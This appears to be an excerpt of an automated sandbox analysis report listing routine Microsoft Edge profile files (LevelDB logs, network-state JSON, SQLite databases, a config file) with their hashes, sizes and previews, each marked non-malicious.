                                                                                                                                                                                                                                                                SHA1:332572E1BAB4731A949E86BFB6075A0DB69C3EF0
                                                                                                                                                                                                                                                                SHA-256:8BD0E7EEE7D87768EF928796492C5E09C4A79C0A5B32D664BF1D58C398EC39B2
                                                                                                                                                                                                                                                                SHA-512:03873B7817F477A080DB845137769795B5E72E5AF37FE9E87B111056DA892563870C6E8B801055F0690B314BECD473B84E323AFF04B0707727BA5D05BA19847C
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:2024/12/16-07:47:10.397 33c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/12/16-07:47:10.398 33c Recovering log #3.2024/12/16-07:47:10.402 33c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\6c6f2530-c4a8-40e8-8944-111d51568164.tmp

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):40
                                                                                                                                                                                                                                                                Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\6d3b764f-765e-4277-a7a4-1780e3af5799.tmp

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:[]

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Network Persistent State (copy)

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):111
                                                                                                                                                                                                                                                                Entropy (8bit):4.718418993774295
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKqk1Yn:YHpoeS7PMVKJTnMRKXk1Yn
                                                                                                                                                                                                                                                                MD5:807419CA9A4734FEAF8D8563A003B048
                                                                                                                                                                                                                                                                SHA1:A723C7D60A65886FFA068711F1E900CCC85922A6
                                                                                                                                                                                                                                                                SHA-256:AA10BF07B0D265BED28F2A475F3564D8DDB5E4D4FFEE0AB6F3A0CC564907B631
                                                                                                                                                                                                                                                                SHA-512:F10D496AE75DB5BA412BD9F17BF0C7DA7632DB92A3FABF7F24071E40F5759C6A875AD8F3A72BAD149DA58B3DA3B816077DF125D0D9F3544ADBA68C66353D206C
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports (copy)

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:[]

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports~RF3735c.TMP (copy)

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:[]

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Sdch Dictionaries (copy)

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):40
                                                                                                                                                                                                                                                                Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Trust Tokens

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 9, cookie 0x7, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):36864
                                                                                                                                                                                                                                                                Entropy (8bit):0.3886039372934488
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24:TLqEeWOT/kIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:T2EeWOT/nDtX5nDOvyKDhU1cSB
                                                                                                                                                                                                                                                                MD5:DEA619BA33775B1BAEEC7B32110CB3BD
                                                                                                                                                                                                                                                                SHA1:949B8246021D004B2E772742D34B2FC8863E1AAA
                                                                                                                                                                                                                                                                SHA-256:3669D76771207A121594B439280A67E3A6B1CBAE8CE67A42C8312D33BA18854B
                                                                                                                                                                                                                                                                SHA-512:7B9741E0339B30D73FACD4670A9898147BE62B8F063A59736AFDDC83D3F03B61349828F2AE88F682D42C177AE37E18349FD41654AEBA50DDF10CD6DC70FA5879
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...}.....$.X..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\a293bf67-bd58-4db7-b112-1aa3a306d8cc.tmp

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):111
                                                                                                                                                                                                                                                                Entropy (8bit):4.718418993774295
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKqk1Yn:YHpoeS7PMVKJTnMRKXk1Yn
                                                                                                                                                                                                                                                                MD5:807419CA9A4734FEAF8D8563A003B048
                                                                                                                                                                                                                                                                SHA1:A723C7D60A65886FFA068711F1E900CCC85922A6
                                                                                                                                                                                                                                                                SHA-256:AA10BF07B0D265BED28F2A475F3564D8DDB5E4D4FFEE0AB6F3A0CC564907B631
                                                                                                                                                                                                                                                                SHA-512:F10D496AE75DB5BA412BD9F17BF0C7DA7632DB92A3FABF7F24071E40F5759C6A875AD8F3A72BAD149DA58B3DA3B816077DF125D0D9F3544ADBA68C66353D206C
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\e7e67baf-52a9-44b5-b49e-ba6a045cc630.tmp

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:[]

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\000003.log

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):80
                                                                                                                                                                                                                                                                Entropy (8bit):3.4921535629071894
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:S8ltHlS+QUl1ASEGhTFljl:S85aEFljl
                                                                                                                                                                                                                                                                MD5:69449520FD9C139C534E2970342C6BD8
                                                                                                                                                                                                                                                                SHA1:230FE369A09DEF748F8CC23AD70FD19ED8D1B885
                                                                                                                                                                                                                                                                SHA-256:3F2E9648DFDB2DDB8E9D607E8802FEF05AFA447E17733DD3FD6D933E7CA49277
                                                                                                                                                                                                                                                                SHA-512:EA34C39AEA13B281A6067DE20AD0CDA84135E70C97DB3CDD59E25E6536B19F7781E5FC0CA4A11C3618D43FC3BD3FBC120DD5C1C47821A248B8AD351F9F4E6367
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:*...#................version.1..namespace-..&f.................&f...............

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):419
                                                                                                                                                                                                                                                                Entropy (8bit):5.2503523429778385
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:12:7HMyvBYebvqBZFUt8OKZ/+OAR56YebvqBaJ:7HMYBYebvyg8OuAD6YebvL
                                                                                                                                                                                                                                                                MD5:C791D992518D2E2DA6B30A9C86B0571C
                                                                                                                                                                                                                                                                SHA1:FB84B3D049ED829A01BA7494E06018AA6998C4F6
                                                                                                                                                                                                                                                                SHA-256:C2F0E0AE40537BC779563E0C49D3283F2A3466DD2C61F5EDEEC16E5FBC277AC1
                                                                                                                                                                                                                                                                SHA-512:B54CF3F210FA3E41BC6CE353636D8FFC567CD2CB916596F7DF7FF26932145730E7401C1ED4F42D6A2EBBDC880B211CE8E28B7976EC6A3220EEE313DF38B3AE41
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:2024/12/16-07:47:28.195 fe0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/12/16-07:47:28.197 fe0 Recovering log #3.2024/12/16-07:47:28.201 fe0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG.old (copy)

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):419
                                                                                                                                                                                                                                                                Entropy (8bit):5.2503523429778385
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:12:7HMyvBYebvqBZFUt8OKZ/+OAR56YebvqBaJ:7HMYBYebvyg8OuAD6YebvL
                                                                                                                                                                                                                                                                MD5:C791D992518D2E2DA6B30A9C86B0571C
                                                                                                                                                                                                                                                                SHA1:FB84B3D049ED829A01BA7494E06018AA6998C4F6
                                                                                                                                                                                                                                                                SHA-256:C2F0E0AE40537BC779563E0C49D3283F2A3466DD2C61F5EDEEC16E5FBC277AC1
                                                                                                                                                                                                                                                                SHA-512:B54CF3F210FA3E41BC6CE353636D8FFC567CD2CB916596F7DF7FF26932145730E7401C1ED4F42D6A2EBBDC880B211CE8E28B7976EC6A3220EEE313DF38B3AE41
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:2024/12/16-07:47:28.195 fe0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/12/16-07:47:28.197 fe0 Recovering log #3.2024/12/16-07:47:28.201 fe0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):328
                                                                                                                                                                                                                                                                Entropy (8bit):5.254638798693241
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:7AFN+q2PCHhJ23oH+TcwtpIFUt8OA9cCWZmw+OA9cBVkwOCHhJ23oH+Tcwta/WLJ:78N+vBYebmFUt8O0W/+ODV56YebaUJ
                                                                                                                                                                                                                                                                MD5:E06B0675AF39720C05E37AAAD7069A03
                                                                                                                                                                                                                                                                SHA1:AE3553F6C48B7537AC97A8EC6522DACA810DFD27
                                                                                                                                                                                                                                                                SHA-256:CA37D5987FC328344F394122A64F8551A717EA8ECBCA383096E299B2DD90F75D
                                                                                                                                                                                                                                                                SHA-512:6B68B128A0BD9329FBC3B56AD7741BABAC15573786F4913FCD4425DB403817A00E12969F29D1D8DB37A7B49D6A65E235113B96E70F52AF7F4B6B417C3868D3EA
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:2024/12/16-07:47:09.493 16cc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/12/16-07:47:09.676 16cc Recovering log #3.2024/12/16-07:47:09.676 16cc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG.old (copy)

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):328
                                                                                                                                                                                                                                                                Entropy (8bit):5.254638798693241
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:7AFN+q2PCHhJ23oH+TcwtpIFUt8OA9cCWZmw+OA9cBVkwOCHhJ23oH+Tcwta/WLJ:78N+vBYebmFUt8O0W/+ODV56YebaUJ
                                                                                                                                                                                                                                                                MD5:E06B0675AF39720C05E37AAAD7069A03
                                                                                                                                                                                                                                                                SHA1:AE3553F6C48B7537AC97A8EC6522DACA810DFD27
                                                                                                                                                                                                                                                                SHA-256:CA37D5987FC328344F394122A64F8551A717EA8ECBCA383096E299B2DD90F75D
                                                                                                                                                                                                                                                                SHA-512:6B68B128A0BD9329FBC3B56AD7741BABAC15573786F4913FCD4425DB403817A00E12969F29D1D8DB37A7B49D6A65E235113B96E70F52AF7F4B6B417C3868D3EA
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:2024/12/16-07:47:09.493 16cc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/12/16-07:47:09.676 16cc Recovering log #3.2024/12/16-07:47:09.676 16cc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 9, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 9
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):196608
                                                                                                                                                                                                                                                                Entropy (8bit):1.2650735324923974
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:KrJ/2qOB1nxCkMCSAELyKOMq+8QTQKC+CVumG:K0q+n0JC9ELyKOMq+8Q75
                                                                                                                                                                                                                                                                MD5:DCE8F8413E31D6E7FFCD9F1910B32275
                                                                                                                                                                                                                                                                SHA1:19CD5493E33F7159DE9BAAA24591021CDE15E965
                                                                                                                                                                                                                                                                SHA-256:FE11A9E09F87E00E92AAE60F9A4176E7D43F3A6FDE732C79772EAD5FF077594E
                                                                                                                                                                                                                                                                SHA-512:4342E1A96B4778091BE412ABE8221042C5E0FC3282A222078CA4E92102C0ED9058310D98DCBFC503A54A527BDA7EAA6C22D532F1290BE73A3C4514B6DAF4EF5F
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ .......[...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\WebStorage\QuotaManager

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 10, cookie 0x7, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):40960
                                                                                                                                                                                                                                                                Entropy (8bit):0.4667605445779214
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:Tnj7dojKsKmjKZKAsjZNOjAhts3N8g1j3UcB0iX:v7doKsKuKZKlZNmu46yjx0y
                                                                                                                                                                                                                                                                MD5:E882DD23D7C460005F9E7A93421FF272
                                                                                                                                                                                                                                                                SHA1:FBABF18D7EAD5C07EB7A1D44CCB75B7095FAC615
                                                                                                                                                                                                                                                                SHA-256:68649247C5ACABF7089F1F612CA90D2EF63F49E0AA46A9B4599C627AD4EB1A9B
                                                                                                                                                                                                                                                                SHA-512:B4081CED7B9EE3D10962FC85BCEDBB5AFB59DA1CBF796FD095542E065D075BC561D1DCC4F061D47E8160754D7D3ABEB527A54FA7A53E012113E93D0792213B4D
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.......w..g...........M...w..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\WebStorage\QuotaManager-journal

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):12824
                                                                                                                                                                                                                                                                Entropy (8bit):0.136412670299364
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:P9Nllv/etXlQJv9HE34//l/h4jRfn1d7jdtQfdlHvbkFlJXtXlQLkH:UlQhlo4puj3dndYlP4FtlQoH
                                                                                                                                                                                                                                                                MD5:399B05B0F4866EBA5A7B131AEC30E80B
                                                                                                                                                                                                                                                                SHA1:227901F1669AE3415382E885F137D2A9E908705C
                                                                                                                                                                                                                                                                SHA-256:D3788D69630188C5029CA1394E2511498FABD1794222ABA624A6E3B980BBB386
                                                                                                                                                                                                                                                                SHA-512:81C675A9CAB19B6768DF6F01A0CA7AB537B63DAFD4D2902BCCBC302EC9A7F6D455EC1477B34480C41D3EC548633CD2275BA420685D6464AF558FB4214C0A752A
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:.............@.b........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\arbitration_service_config.json

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (3951), with CRLF line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):11755
                                                                                                                                                                                                                                                                Entropy (8bit):5.190465908239046
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:hH4vrmqRBB4W4PoiUDNaxvR5FCHFcoaSbqGEDI:hH4vrmUB6W4jR3GaSbqGEDI
                                                                                                                                                                                                                                                                MD5:07301A857C41B5854E6F84CA00B81EA0
                                                                                                                                                                                                                                                                SHA1:7441FC1018508FF4F3DBAA139A21634C08ED979C
                                                                                                                                                                                                                                                                SHA-256:2343C541E095E1D5F202E8D2A0807113E69E1969AF8E15E3644C51DB0BF33FBF
                                                                                                                                                                                                                                                                SHA-512:00ADE38E9D2F07C64648202F1D5F18A2DFB2781C0517EAEBCD567D8A77DBB7CB40A58B7C7D4EC03336A63A20D2E11DD64448F020C6FF72F06CA870AA2B4765E0
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Travel.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Weather.Bubble": 1,.. "2cb2db96-3bd0-403e-abe2-9269b3761041.Bubble": 1,.

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\c951c40d-81a5-4803-9d77-076008cd7b1a.tmp

                                                                                                                                                                                                                                                                Download File
